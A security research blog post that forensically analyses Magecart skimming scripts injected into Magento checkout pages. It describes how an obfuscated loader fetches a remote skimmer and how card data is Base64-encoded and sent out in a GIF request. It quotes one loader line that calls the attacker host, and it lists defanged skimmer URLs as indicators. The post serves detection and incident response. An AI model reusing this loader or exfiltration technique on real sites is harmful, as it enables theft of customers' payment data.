Loading...
Blogs & Stories

SpiderLabs Blog

Attracting more than a half-million annual readers, this is the security community's go-to destination for technical breakdowns of the latest threats, critical vulnerability disclosures and cutting-edge research.

Digging Deep Into Magecart Malware

Last week, one of my SpiderLabs colleagues was working on a PCI forensic triage for a website. During his investigation, he asked me to check out some HTTP traffic he captured during an online retail store checkout session.

This was the HTTP capture:

Untitled-1

 

At first glance, the GET request is very suspicious. Firstly,  the HTTP Referer URL path contains “/checkout/onepage” (a very common URL target path of Magecart attacks). Secondly,  the GET request is to a third party domain (mxcounter.com). And thirdly it requests a “.GIF” file followed by a long Base64 encoded string.

So I immediately decoded the Base64 string which resulted in the following :

Decoded_exfil_data

 

Some obvious data exfiltration is going on there!

Next,  I investigated and checked the HTML source code in the checkout page and found this JavaScript at the bottom of the webpage which was not obvious at first:

InjectedJavascript3

 

De-obfuscating the code results in  something like this:

DecodedInjectedJavascript

 

Basically what this script does is:

  1. check if the current page URL location contains the string ‘out/onepag’ (concatenated checkout/onepage)
  2. create a <script> element and points the external script source to 'https://mxcounter.com/click.js?v=1.7'
  3. append the <script> element in the HTML <head>

In short, it injects an external malicious script into the checkout page.

Checking out the JavaScript code from 'https://mxcounter.com/click.js?v=1.7' uncovers a skimming script, as seen in the image below. This script captures personal details and credit card data entered by the merchant’s customer in the checkout page. This details are stored in a JavaScript dictionary with a variable name ‘data’, encoded in  Base64  and sent as a URL parameter to https://mxcounter.com/c.gif?<Base64 encoded data> through a GET tunnel.

Mxcounter1

 

The WHOIS record of mxcounter.com shows that the IP address of the DNS A record is located in Ukraine:

Mxcounter_whoisrecord

There are actually multiple versions of this skimming JavaScript from the same domain, which probably cater to different infected online merchants.

 

For example, here’s version 1.6 of the script:

Mxcounterv1.9

 

and version 1.8:

Mxcounterv1.8

 

and version 2.0, so on and so forth

Mxcounter2.0

 

So with all this in mind, I was curious to find other websites that had similar infections. I first tried Googling the URL “mxcounter.com”, but it didn’t really show me interesting results. I really wanted to search for websites for a string in the HTML code. I stumbled across this website called nerdydata.com which has a capability to do that:

The search result returned one website:

Nerdydata_mxcounter

 

And sure enough, that website in the search result is infected:

Infectedwebsite_searchresult

Mxcounter2.34

 

So I tried a different search string and I searched for a string from the JavaScript code itself:

var img = document.createElement('script')

And there, it returned over 40 websites. I checked each of these websites and half of them were infected with Magecart malware scripts

46website infected

 

I also checked most of the exfiltration/skimming URLs, but some of them are already down at the time of this writing. All of the injected source scripts in the infected webpages are encoded in Base64, which use the JavaScript method atob() to decode it. For example:

img.src = atob("aHR0cHM6Ly9teGNvdW50ZXIuY29t")

the string “aHR0cHM6Ly9teGNvdW50ZXIuY29t” is Base64 encoding of http://mxcounter.com.

One of the interesting things I learned during this investigation is that some of these Magecart malware scripts are really sneaky.

Take, for example, this infected retail webpage  injected by  a malicious JavaScript hosted at an external host:

Mj1

 

That Base64 encoded string is actually the link to the malicious external script source:

Totally

Yet, when visiting that URL link directly, you will get a “503 Service Unavailable” HTTP error.

Totally2

 

However, when you specify the correct HTTP header, User-Agent, Referer and Host, only then will return a malicious JavaScript. Here we used Postman to request the same website:

Postman

 

This code is still obfuscated, however, de-obfuscating the code reveals it is the typical checkout page skimming routine with exfiltration of data to the attacker’s host.

There are probably numerous other infected websites out there but here are the exfiltration/skimming JavaScript URLs I compiled during the investigation:

https://adsapigate[.]com/api.js?v=2.6
https://adsapigate[.]com/api.js?v=3.5
https://apitstatus[.]com/api.js?v=2.1.5
https://billgetstatus[.]com/api.js?v=1.6
https://clickdeskstats[.]com/cd.js
https://cloudodesc[.]com/gtm.js?v=1.3
https://cloudodesc[.]com/gtm.js?v=2.1
https://cloudodesc[.]com/gtm.js?v=2.94
https://gtmproc[.]com/gtm.js?v=1.5
https://livecheckpay[.]com/api.js?v=2.3
https://mxcounter[.]com/click.js?v=1.7
https://newrelicnet[.]com/api.js?v=1.2
https://newrelicnet[.]com/api.js?v=1.4
https://newrelicnet[.]com/api.js?v=4.5
https://nr-public[.]com/api.js?v=2.6
https://nr-public[.]com/api.js?v=2.8
https://ordercheckpays[.]com/api.js?v=2.29
https://ordercheckpays[.]com/api.js?v=3.3
https://reactjsapi[.]com/api.js?v=4.2.0
https://tagsmediaget[.]com/api.js?v=1.1.5
https://tagstracking[.]com/tag.js?v=2.1.2
https://tagstracking[.]com/tag.js?v=2.1.4
https://tagstracking[.]com/tag.js?v=2.1.8
https://tagstracking[.]com/tag.js?v=2.2.2
https://tagstracking[.]com/tag.js?v=2.2.4
https://tagstracking[.]com/tag.js?v=2.2.6
https://trust-tracker[.]com/tagtech.js

Most of the infected websites appear to be running old versions of Magento framework, and exploitation of vulnerabilities in Magento is the most likely cause of the infection, but it is hard to know for sure without conducting further internal investigations. Other possibilities are admin panel brute-force attack or spear-phishing attacks.

So, if you administer or own an e-commerce website running Magento platform, you may want to scan your checkout pages fora possible compromise. You can scan for Javascript code like CreateElement() method i.e. "var img = document.createElement('script')" then you can check if there are Base64 encoded strings that follow after that or the use of a JavaScript method atob(). You can decode the strings with Base64 tools such as tools like CyberChef (https://gchq.github.io/CyberChef/). This Base64 string is usually a URL. You should be able to decide if this URL is something you expect or suspect. 

 

Recent SpiderLabs Blog Posts